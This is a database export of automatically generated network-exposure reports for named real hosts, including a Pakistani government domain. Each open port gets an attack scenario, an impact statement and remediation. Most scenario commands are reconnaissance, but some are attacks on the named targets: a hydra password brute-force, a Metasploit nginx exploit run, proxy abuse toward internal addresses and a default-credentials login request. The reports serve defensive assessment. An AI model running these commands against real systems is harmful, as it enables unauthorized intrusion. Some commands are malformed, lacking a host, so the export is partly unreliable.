|\n| Asset / URL | 23.227.38.65 |\n\n**Description** \nPort 8020/tcp is not assigned to any standard protocol and may run proprietary or custom applications. Unknown services represent blind spots in visibility and control.\n\n**Attack Scenario (Proof of Concept)** \nNmap scan:\n```bash\nnmap -sV -p 8020 23.227.38.65\n```\nIf banner grabbing reveals service info, attackers may attempt fingerprinting or exploit known weaknesses.\n\n**Business Impact** \nUndocumented or unsupported services introduce unpredictability and elevate risk of zero-day exploitation or insider threats.\n\n**Remediation** \n- Identify and classify the service behind port 8020.\n- Apply principle of least privilege; disable if unnecessary.\n- Maintain updated inventories of all listening services.\n\n---\n\n### Open Port 8443/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 23.227.38.65 |\n\n**Description** \nPort 8443/tcp is frequently used as an alternative HTTPS port, especially when 443 is already occupied. It may serve administrative panels, API gateways, or third-party integrations.\n\n**Attack Scenario (Proof of Concept)** \nConnecting securely:\n```bash\ncurl -k https://23.227.38.65:8443\n```\nIf valid SSL/TLS handshake occurs, attackers inspect certificate metadata and attempt to exploit vulnerabilities in TLS implementations or backend logic.\n\n**Business Impact** \nImproperly configured SSL termination or backend services can lead to man-in-the-middle attacks, session hijacking, or exposure of sensitive data.\n\n**Remediation** \n- Validate SSL certificates and enforce modern cipher suites.\n- Restrict access to necessary roles only.\n- Log and monitor traffic patterns for anomalies.\n\n---\n\n### Open Port 80/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 23.227.38.65 |\n\n**Description** \nHTTP service running on port 80/tcp is standard for serving websites. However, if not redirected to HTTPS, it exposes users to plaintext communication risks.\n\n**Attack Scenario (Proof of Concept)** \nBasic connection:\n```bash\ncurl http://23.227.38.65\n```\nIf successful, attackers can intercept cookies, inject malicious scripts, or perform downgrade attacks.\n\n**Business Impact** \nLack of encryption leads to eavesdropping, tampering, and potential compromise of user sessions or transmitted data.\n\n**Remediation** \n- Redirect all HTTP requests to HTTPS using HSTS headers.\n- Enforce TLS 1.2+ across all endpoints.\n- Deploy Let’s Encrypt or enterprise-grade certificates.\n\n---\n\n### Open Port 443/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 23.227.38.65 |\n\n**Description** \nHTTPS service on port 443/tcp ensures encrypted communication between clients and the server. Proper implementation mitigates many passive and active network-based threats.\n\n**Attack Scenario (Proof of Concept)** \nSecure browsing:\n```bash\ncurl -v https://23.227.38.65\n```\nAttackers may check for expired certs, weak protocols, or vulnerable cipher suites during reconnaissance.\n\n**Business Impact** \nWell-configured HTTPS protects confidentiality and integrity. Misconfiguration, however, undermines trust and opens avenues for MITM attacks.\n\n**Remediation** \n- Use tools like Qualys SSL Labs to assess TLS posture.\n- Renew certificates before expiration.\n- Disable deprecated protocols (SSLv3, TLS 1.0).\n\n---\n\n### Open Port 80/tcp (http) on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description** \nThe domain `eveen.pk` listens on port 80/tcp for HTTP traffic. As with any HTTP endpoint, failure to redirect to HTTPS leaves communications vulnerable to interception.\n\n**Attack Scenario (Proof of Concept)** \nBrowser navigation or CLI tool:\n```bash\ncurl http://eveen.pk\n```\nIf response includes forms or session tokens, attackers can capture them in transit.\n\n**Business Impact** \nData transmitted over HTTP lacks protection, increasing susceptibility to credential theft, session fixation, and content injection.\n\n**Remediation** \n- Implement automatic redirection from HTTP to HTTPS.\n- Set up HSTS header with preload directive.\n- Monitor for mixed-content warnings.\n\n---\n\n### Open Port 443/tcp (https) on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description** \nHTTPS service on port 443/tcp provides encrypted communication for `eveen.pk`, ensuring privacy and authenticity. Correct deployment prevents most passive surveillance and some active attacks.\n\n**Attack Scenario (Proof of Concept)** \nSecure request:\n```bash\ncurl -I https://eveen.pk\n```\nInspecting response headers helps identify issues like missing security headers or outdated TLS settings.\n\n**Business Impact** \nProper HTTPS implementation enhances customer confidence and meets regulatory requirements for data protection.\n\n**Remediation** \n- Periodically review TLS configurations and certificate validity.\n- Add Content-Security-Policy and X-Frame-Options headers.\n- Employ certificate pinning where feasible.\n\n---\n\n### Open Port 2052/tcp (http) – Cloudflare http proxy on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description** \nPort 2052/tcp hosts a Cloudflare-managed HTTP proxy for `eveen.pk`. This setup allows CDN acceleration and DDoS mitigation but also introduces reliance on third-party infrastructure.\n\n**Attack Scenario (Proof of Concept)** \nDirect access:\n```bash\ncurl http://eveen.pk:2052\n```\nAttackers may attempt to bypass Cloudflare protections by targeting origin servers directly.\n\n**Business Impact** \nOver-reliance on CDNs without securing origins can undermine their benefits and leave gaps in defense layers.\n\n**Remediation** \n- Lock down direct access to origin IPs.\n- Configure firewall rules to accept traffic only from Cloudflare ranges.\n- Monitor for attempts to reach origin outside CDN.\n\n---\n\n### Open Port 2053/tcp (http) – nginx on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description** \nNginx serves HTTP traffic on port 2053/tcp for `eveen.pk`. Nginx is robust but requires careful tuning to avoid misconfigurations leading to information leakage or denial-of-service.\n\n**Attack Scenario (Proof of Concept)** \nBanner grabbing:\n```bash\nnmap -sV -p 2053 eveen.pk\n```\nFollowed by probing for default paths or hidden files:\n```bash\ngobuster dir -u http://eveen.pk:2053 -w /usr/share/dirb/wordlists/common.txt\n```\n\n**Business Impact** \nExposed web servers increase likelihood of path traversal, SSRF, or buffer overflow exploits depending on version and configuration.\n\n**Remediation** \n- Keep Nginx updated to latest stable release.\n- Hide server version in responses (`server_tokens off;`).\n- Implement rate limiting and request filtering.\n\n---\n\n### Open Port 2082/tcp (http) – Cloudflare http proxy on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description** \nAnother Cloudflare-managed HTTP proxy operates on port 2082/tcp. Multiple proxy ports suggest complex routing or legacy support structures which complicate security oversight.\n\n**Attack Scenario (Proof of Concept)** \nEnumeration:\n```bash\nnmap -p 2082 eveen.pk\n```\nThen accessing:\n```bash\ncurl http://eveen.pk:2082\n```\nAttackers may compare behavior across different proxy ports to find inconsistencies or bypasses.\n\n**Business Impact** \nMultiple ingress points multiply opportunities for misconfiguration and reduce clarity around who owns each service.\n\n**Remediation** \n- Consolidate redundant proxy endpoints.\n- Document ownership and responsibilities clearly.\n- Regularly audit and retire obsolete ports.\n\n---\n\n### Open Port 2083/tcp (http) – nginx on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description** \nThis instance of Nginx runs on port 2083/tcp, likely supporting secure webmail or admin functions. Given its association with cPanel, improper access controls could yield significant privileges.\n\n**Attack Scenario (Proof of Concept)** \nBrute-force login attempts:\n```bash\nhydra -l admin -P passwords.txt eveen.pk http-get /login -s 2083\n```\nAlternatively, scanning for known vulnerabilities:\n```bash\nnikto -h http://eveen.pk:2083\n```\n\n**Business Impact** \nCompromise of administrative portals enables full control over hosted domains, databases, and user accounts.\n\n**Remediation** \n- Enforce two-factor authentication.\n- Rotate default credentials immediately after installation.\n- Restrict access geographically or by role.\n\n---\n\n### Open Port 2086/tcp (http) – Cloudflare http proxy on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description** \nYet another Cloudflare-managed HTTP proxy on port 2086/tcp. Repeated use of similar proxy configurations suggests either intentional redundancy or poor architectural planning.\n\n**Attack Scenario (Proof of Concept)** \nComparative analysis:\n```bash\ncurl -H \"Host: eveen.pk\" http://:2086\n```\nAttackers seek differences in caching, routing, or security enforcement among various proxy ports.\n\n**Business Impact** \nInconsistent proxy behaviors create exploitable discrepancies that adversaries can leverage to evade detection or bypass restrictions.\n\n**Remediation** \n- Standardize proxy configurations across all ports.\n- Centralize logging and monitoring for all edge nodes.\n- Retire unused or duplicate proxy instances.\n\n---\n\n### Open Port 2087/tcp (http) – nginx on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description** \nRunning Nginx on port 2087/tcp implies yet another distinct service layer. With multiple Nginx instances, coordination becomes critical to prevent conflicting policies or overlapping responsibilities.\n\n**Attack Scenario (Proof of Concept)** \nVersion-specific exploit testing:\n```bash\nsearchsploit nginx \n```\nThen crafting targeted payloads:\n```bash\nmsfconsole -q -x 'use exploit/linux/http/nginx_chunked_size; set RHOSTS eveen.pk; set RPORT 2087; run'\n```\n\n**Business Impact** \nOutdated or poorly maintained Nginx installations are susceptible to remote code execution, memory corruption, or DoS conditions.\n\n**Remediation** \n- Automate updates and patch cycles.\n- Harden Nginx configurations with security modules.\n- Conduct regular penetration tests focusing on web stack components.\n\n---\n\n### Open Port 2095/tcp (http) – Cloudflare http proxy on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description** \nAs previously noted, port 2095/tcp usually relates to cPanel webmail. When fronted by Cloudflare, additional considerations arise regarding caching, origin shielding, and access logging.\n\n**Attack Scenario (Proof of Concept)** \nBypassing Cloudflare:\n```bash\ndig +short A eveen.pk\n# Then connecting directly to returned IP(s)\ncurl http://:2095\n```\nAttackers aim to circumvent WAF protections or abuse misrouted traffic.\n\n**Business Impact** \nOrigin bypasses nullify CDN advantages and expose raw backend infrastructure to direct attacks.\n\n**Remediation** \n- Prevent DNS resolution of origin IPs.\n- Enforce strict hostname validation in Nginx/Virtual Host configs.\n- Monitor for unusual spikes in direct-to-origin traffic.\n\n---\n\n### Open Port 2096/tcp (http) – nginx on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description** \nPort 2096/tcp typically serves cPanel’s secure webmail interface. Hosting this on Nginx rather than Apache may imply customization or containerization efforts requiring extra scrutiny.\n\n**Attack Scenario (Proof of Concept)** \nDirectory enumeration:\n```bash\ndirb http://eveen.pk:2096 /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt\n```\nFollowed by form-based attacks or XSS injection attempts.\n\n**Business Impact** \nWebmail interfaces contain highly sensitive personal and business correspondence, making them prime targets for espionage or blackmail.\n\n**Remediation** \n- Sanitize input fields rigorously.\n- Apply Content Security Policy (CSP) headers.\n- Educate users on recognizing phishing attempts.\n\n---\n\n### Open Port 8008/tcp (http) on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description** \nPort 8008/tcp again appears here for `eveen.pk`, reinforcing earlier concerns about inconsistent service mapping and unclear architectural boundaries.\n\n**Attack Scenario (Proof of Concept)** \nReconnaissance:\n```bash\nwhatweb http://eveen.pk:8008\n```\nIdentifying technologies used facilitates targeted exploitation strategies.\n\n**Business Impact** \nAmbiguous service roles hinder incident response and increase time-to-detection for breaches involving obscure ports.\n\n**Remediation** \n- Map and label all services comprehensively.\n- Establish naming conventions and documentation standards.\n- Decommission redundant or undocumented services promptly.\n\n---\n\n### Open Port 8015/tcp (http-proxy) — FortiGuard Web Filtering / eveen.pk / eveen.pk:8015\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description** \nPort 8015/tcp is open and identified by Nmap as running an HTTP proxy service associated with Fortinet's FortiGuard Web Filtering solution. This configuration typically indicates that the system acts as a forward or reverse proxy for filtering web traffic. While not inherently insecure, exposing such services directly on public interfaces can provide attackers with insight into internal infrastructure or potentially bypass access controls if misconfigured.\n\nThe presence of this port may indicate that the organization uses Fortinet appliances for content filtering or secure web gateway functionality. Attackers often scan for known proxy ports to identify intermediary systems that might allow them to relay malicious traffic or probe internal networks indirectly.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker performs reconnaissance using tools like `nmap` or `proxycheck` to detect open proxies:\n\n```bash\nnmap -p 8015 --script http-open-proxy eveen.pk\n```\n\nIf successful, they may attempt to route traffic through the proxy:\n\n```bash\ncurl --proxy http://eveen.pk:8015 http://internal-service.local\n```\n\nThis could lead to unauthorized access to internal resources or abuse of the proxy for anonymizing attacks.\n\n**Business Impact** \nExposing internal proxy services increases the attack surface and provides potential pathways for lateral movement within the network. If improperly configured, these endpoints can be abused for data exfiltration, scanning internal hosts, or launching further targeted attacks against backend systems.\n\n**Remediation** \n- Restrict access to port 8015/tcp at the firewall level to only trusted IP ranges.\n- Ensure that the FortiGuard Web Filtering appliance is properly hardened and updated.\n- Disable unnecessary proxy exposure unless explicitly required for business operations.\n- Monitor logs from Fortinet devices for signs of misuse.\n- Reference: CWE-16 (Configuration), NIST SP 800-53 SC-7 (Boundary Protection)\n\n---\n\n### Open Port 8020/tcp (http-proxy) — FortiGuard Web Filtering / eveen.pk / eveen.pk:8020\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description** \nSimilar to port 8015, port 8020/tcp is also identified as hosting an HTTP proxy linked to Fortinet’s FortiGuard Web Filtering platform. The dual presence of multiple proxy ports suggests either redundancy, segmentation, or different policy zones managed by the same device. These ports should be reviewed for necessity and restricted appropriately.\n\nSuch configurations are common in enterprise environments but pose risks when exposed without proper authentication or logging mechanisms.\n\n**Attack Scenario (Proof of Concept)** \nUsing automated scanning tools such as Burp Suite or custom scripts, an attacker identifies both 8015 and 8020 as active proxies:\n\n```bash\nfor port in 8015 8020; do\n curl -x http://eveen.pk:$port http://example.com\ndone\n```\n\nThey then test whether internal addresses can be accessed via the proxy:\n\n```bash\ncurl -x http://eveen.pk:8020 http://192.168.1.10/admin\n```\n\nSuccessful responses indicate improper restrictions and possible internal reconnaissance opportunities.\n\n**Business Impact** \nUnauthorized use of exposed proxy services can result in unauthorized access to sensitive internal applications, violation of compliance requirements, and increased risk of data breaches due to indirect exploitation paths.\n\n**Remediation** \n- Audit all proxy-enabled ports and remove those not essential for operation.\n- Implement strict ACLs limiting access to authorized users or systems.\n- Enable detailed logging and alerting for proxy usage anomalies.\n- Regularly update firmware and review default configurations on Fortinet appliances.\n- Reference: CWE-16, NIST SP 800-53 AC-4 (Information Flow Enforcement)\n\n---\n\n### Open Port 8080/tcp (http) — Cloudflare http proxy / eveen.pk / eveen.pk:8080\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description** \nPort 8080/tcp is open and identified as being served by a Cloudflare HTTP proxy. This implies that the domain is fronted by Cloudflare’s CDN or security services, which intercept and forward requests to origin servers. However, direct access to this port outside of standard routing (e.g., bypassing DNS resolution) may expose backend infrastructure details or misconfigurations.\n\nWhile Cloudflare generally enhances security, exposing alternative ports like 8080 without appropriate safeguards can undermine its protective benefits.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker attempts to connect directly to the origin server behind Cloudflare:\n\n```bash\ncurl -H \"Host: eveen.pk\" http://[origin_ip]:8080/\n```\n\nAlternatively, they may try to enumerate subdomains or hidden services hosted on non-standard ports:\n\n```bash\nffuf -u http://eveen.pk:8080/FUZZ -w wordlist.txt\n```\n\nIf successful, this could reveal unprotected administrative panels or staging environments.\n\n**Business Impact** \nBypassing Cloudflare protections exposes backend infrastructure to direct probing and exploitation. It undermines DDoS mitigation, WAF rules, and rate-limiting policies enforced at the edge layer.\n\n**Remediation** \n- Block direct access to origin IPs on non-standard ports using firewall rules.\n- Configure origin servers to reject requests not routed through Cloudflare.\n- Enforce mutual TLS between Cloudflare and origin servers where feasible.\n- Review Cloudflare settings to ensure no unintended ports are exposed publicly.\n- Reference: CWE-16, OWASP API1:2019 – Broken Object Level Authorization\n\n---\n\n### Open Port 8443/tcp (http) — Cloudflare http proxy / eveen.pk / eveen.pk:8443\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description** \nPort 8443/tcp is open and recognized as another instance of a Cloudflare-managed HTTP proxy, likely serving HTTPS traffic. Commonly used as an alternative SSL/TLS endpoint, this port may host legacy or secondary services. Its visibility increases the likelihood of enumeration and targeted attacks aimed at identifying weak points in the TLS setup or backend logic.\n\nMisconfiguration here could allow attackers to downgrade connections or exploit outdated cipher suites.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker tests for SSL/TLS vulnerabilities on port 8443:\n\n```bash\nsslscan eveen.pk:8443\n```\n\nThey may also check for certificate mismatches or expired certificates:\n\n```bash\nopenssl s_client -connect eveen.pk:8443 -servername eveen.pk\n```\n\nAdditionally, they might attempt to access internal APIs or debug endpoints:\n\n```bash\ncurl -k https://eveen.pk:8443/api/debug\n```\n\nAny success indicates poor hardening practices and potential entry vectors.\n\n**Business Impact** \nImproper handling of encrypted communications can lead to man-in-the-middle attacks, credential theft, and exposure of sensitive user data. Regulatory violations related to encryption standards (PCI-DSS, HIPAA) may occur if insecure protocols are detected.\n\n**Remediation** \n- Disable support for deprecated TLS versions (<1.2).\n- Enforce strong cipher suites and disable weak algorithms.\n- Redirect all traffic to port 443 where possible.\n- Regularly audit SSL/TLS configurations using tools like Mozilla Observatory or Qualys SSL Labs.\n- Reference: CWE-327 (Use of Weak Cryptographic Algorithm), OWASP A03:2017 – Sensitive Data Exposure\n\n---\n\n### Open Port 8880/tcp (http) — Cloudflare http proxy / eveen.pk / eveen.pk:8880\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description** \nPort 8880/tcp is open and attributed to a Cloudflare HTTP proxy. Often used for development, testing, or alternate routing scenarios, this port may serve non-production content or act as a fallback path. Public accessibility introduces additional risk surfaces, especially if it serves less-protected or debug-oriented interfaces.\n\nOrganizations sometimes overlook securing auxiliary ports during deployment cycles, making them attractive targets for initial compromise stages.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker scans for accessible debug pages or developer consoles:\n\n```bash\ndirb http://eveen.pk:8880 /usr/share/dirb/wordlists/common.txt\n```\n\nThey may also look for version disclosures or error messages indicating underlying frameworks:\n\n```bash\ncurl -v http://eveen.pk:8880/\n```\n\nIf found, these artifacts can guide more sophisticated follow-up attacks targeting specific software flaws.\n\n**Business Impact** \nUnsecured auxiliary ports increase the probability of early-stage compromises, including information leakage about internal architecture, credentials embedded in source code, or access to management dashboards.\n\n**Remediation** \n- Remove or restrict access to non-critical ports like 8880 unless absolutely necessary.\n- Apply consistent authentication and authorization across all application layers.\n- Conduct regular penetration tests focused on identifying shadow IT assets.\n- Implement centralized monitoring and alerting for anomalous access patterns on non-standard ports.\n- Reference: CWE-16, OWASP ASVS v4.0 – V1 Architecture, Design and Threat Modeling Requirements","summary":{"total":25}},"summary":{"total":25}},{"_id":{"$oid":"6a0f60cb12f44e6c4312c4ea"},"created_at":{"$date":"2026-05-21T19:45:15.424Z"},"url":"https://ep.gov.pk/","tool":"generate_network_exposure_report","result":{"url":"https://ep.gov.pk/","category":"network_exposure","timestamp":"2026-05-21T19:45:15.418640+00:00","report":"### Open Port 8020/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description** \nPort 8020/TCP is open on the host at IP address `124.109.52.82`. This port is commonly associated with services such as Apache Tomcat AJP (Apache JServ Protocol), which typically runs on ports like 8009 or 8020 depending on configuration. An open port indicates that a service is actively listening for incoming connections. While not inherently insecure, exposing non-standard HTTP or application-specific ports increases the attack surface by providing additional entry points for reconnaissance and exploitation.\n\nAn attacker can use tools like Nmap or Masscan to enumerate open ports and then proceed with targeted fingerprinting using banners or protocol-specific probes.\n\n**Attack Scenario (Proof of Concept)** \nA malicious actor performs initial reconnaissance using Nmap:\n\n```bash\nnmap -p 8020 -sV 124.109.52.82\n```\n\nIf the service responds with an identification such as \"Apache Tomcat\" or similar, they may attempt further probing via crafted AJP requests or exploit known vulnerabilities related to exposed management interfaces.\n\nExample payload targeting potential misconfigured AJP connector:\n```http\nGET /manager/html HTTP/1.1\nHost: 124.109.52.82:8020\nAuthorization: Basic YWRtaW46YWRtaW4=\n```\n\nThis could lead to unauthorized access if default credentials are used or if authentication has been disabled.\n\n**Business Impact** \nExposing internal administrative or backend communication protocols increases risk of compromise due to unpatched software, weak configurations, or credential exposure. Even though this finding itself does not indicate a vulnerability, it contributes to information leakage and expands the scope for lateral movement within the infrastructure.\n\n**Remediation** \n- Restrict access to port 8020 from external networks using firewall rules.\n- If AJP functionality is required internally only, bind the service to localhost (`127.0.0.1`) instead of all interfaces.\n- Disable unnecessary connectors in server configuration files (e.g., `server.xml` for Tomcat).\n- Regularly audit exposed services and ensure they align with business requirements.\n\nReference: CWE-16 – Configuration\n\n---\n\n### Open Port 8015/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description** \nPort 8015/TCP is open on the system located at `124.109.52.82`. This port is often used by custom applications, middleware systems, or development environments but lacks standardization. Its presence suggests either a bespoke web service or auxiliary component tied to another primary service running on the host. Without proper context or documentation, identifying its purpose requires active probing and banner grabbing techniques.\n\nAttackers frequently scan ranges of high-numbered TCP ports to discover hidden or undocumented services that might have weaker security controls than standard ones.\n\n**Attack Scenario (Proof of Concept)** \nUsing curl or netcat to probe the endpoint:\n\n```bash\ncurl http://124.109.52.82:8015/\nnc -zv 124.109.52.82 8015\n```\n\nIf a response is returned indicating a web-based interface or API, attackers will analyze headers, paths, and endpoints for signs of vulnerable components or debug features enabled in production.\n\nFor instance, requesting `/status`, `/health`, or `/debug/pprof` endpoints common in GoLang or Node.js apps may yield sensitive runtime diagnostics.\n\n**Business Impact** \nUnintended disclosure of internal services exposes organizations to risks including unauthorized data access, denial-of-service conditions, or privilege escalation opportunities. It also complicates compliance audits where visibility into all listening services is mandatory.\n\n**Remediation** \n- Identify and document the service bound to port 8015.\n- Remove or restrict public accessibility unless explicitly required.\n- Apply principle of least privilege when configuring network listeners.\n- Implement centralized logging and monitoring around unusual port activity.\n\nReference: CWE-16 – Configuration\n\n---\n\n### Open Port 8008/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description** \nThe discovery of an open port 8008/TCP on `124.109.52.82` indicates that some form of service—potentially an alternative HTTP listener—is accepting inbound traffic. Historically, port 8008 was designated for HTTP Alternate, although modern usage varies widely across different platforms and frameworks. Commonly seen in embedded devices, IoT appliances, or containerized microservices, this port should be treated with caution during assessments.\n\nReconnaissance tools such as Shodan or direct scanning can easily detect such services, making them targets for automated attacks.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker initiates a basic GET request to determine the nature of the service:\n\n```bash\ncurl -I http://124.109.52.82:8008\n```\n\nIf it returns a valid HTTP status code along with headers like `Server: lighttpd` or `X-Powered-By`, more advanced enumeration begins. They may try accessing well-known paths like `/admin`, `/config`, or `/api`.\n\nAlternatively, sending malformed input could expose stack traces or error pages revealing underlying technologies or versions susceptible to exploits.\n\n**Business Impact** \nInsecure deployment practices leading to unintended exposure of alternate HTTP interfaces increase organizational risk profiles significantly. These interfaces often lack robust authentication mechanisms or logging capabilities compared to mainline services.\n\n**Remediation** \n- Confirm whether port 8008 serves a legitimate business function; remove otherwise.\n- Enforce strong authentication and encryption (HTTPS) if accessible externally.\n- Audit and harden service configurations against insecure defaults.\n- Monitor logs for anomalous access patterns indicative of probing behavior.\n\nReference: CWE-16 – Configuration\n\n---\n\n### Open Port 443/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description** \nPort 443/TCP is open on the asset `124.109.52.82`, corresponding to the domain `https://ep.gov.pk/`. As the standard port for HTTPS traffic, this represents the secure web interface for the site. Although expected for most public-facing websites, the mere fact of being open still constitutes part of the overall network footprint and must be evaluated alongside other findings for holistic risk posture analysis.\n\nAttackers routinely target HTTPS services for certificate inspection, cipher suite weaknesses, TLS downgrade attempts, and exploitation of outdated SSL/TLS implementations.\n\n**Attack Scenario (Proof of Concept)** \nUsing OpenSSL to inspect the TLS handshake:\n\n```bash\nopenssl s_client -connect ep.gov.pk:443 -servername ep.gov.pk\n```\n\nReview supported ciphersuites, certificate validity period, issuer chain, and presence of deprecated protocols like SSLv3 or TLS 1.0. Tools like testssl.sh automate comprehensive checks:\n\n```bash\ntestssl.sh https://ep.gov.pk\n```\n\nAdditionally, directory brute-forcing or virtual host enumeration may reveal hidden content or subdomains hosted behind the same IP.\n\n**Business Impact** \nWhile essential for delivering encrypted communications, improperly configured TLS settings undermine trustworthiness and expose users to man-in-the-middle attacks, session hijacking, or credential theft. Non-compliance with industry standards (PCI DSS, HIPAA) may result in legal ramifications.\n\n**Remediation** \n- Ensure TLS version 1.2 or higher is enforced.\n- Deploy HSTS headers and redirect all HTTP traffic to HTTPS.\n- Renew certificates before expiration and utilize certificate transparency logs.\n- Employ Perfect Forward Secrecy (PFS) and disable weak cryptographic algorithms.\n\nReference: CWE-327 – Use of a Broken or Risky Cryptographic Algorithm \nOWASP Top Ten: A07:2021 – Identification and Authentication Failures","summary":{"total":4}},"summary":{"total":4}},{"_id":{"$oid":"6a0ff581eaf2c9077db90d2c"},"created_at":{"$date":"2026-05-22T06:19:45.984Z"},"url":"https://ep.gov.pk/","tool":"generate_network_exposure_report","result":{"url":"https://ep.gov.pk/","category":"network_exposure","timestamp":"2026-05-22T06:19:45.975063+00:00","report":"### Open Port 8020/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description** \nPort 8020/tcp is open on the IP address `124.109.52.82`. This port has been identified by the tool Naabu during a network scan. While not inherently insecure, exposed ports increase the attack surface of a system and should be evaluated for necessity and proper configuration. The service running on this port was later identified via Nmap as an HTTP proxy associated with FortiGuard Web Filtering.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker performs a port scan using tools like `nmap` or `masscan`, identifying that port 8020 is open. They then attempt to interact with the service:\n\n```bash\nnmap -sV -p 8020 124.109.52.82\n```\n\nIf misconfigured, such proxies may allow unauthorized access to internal resources or act as 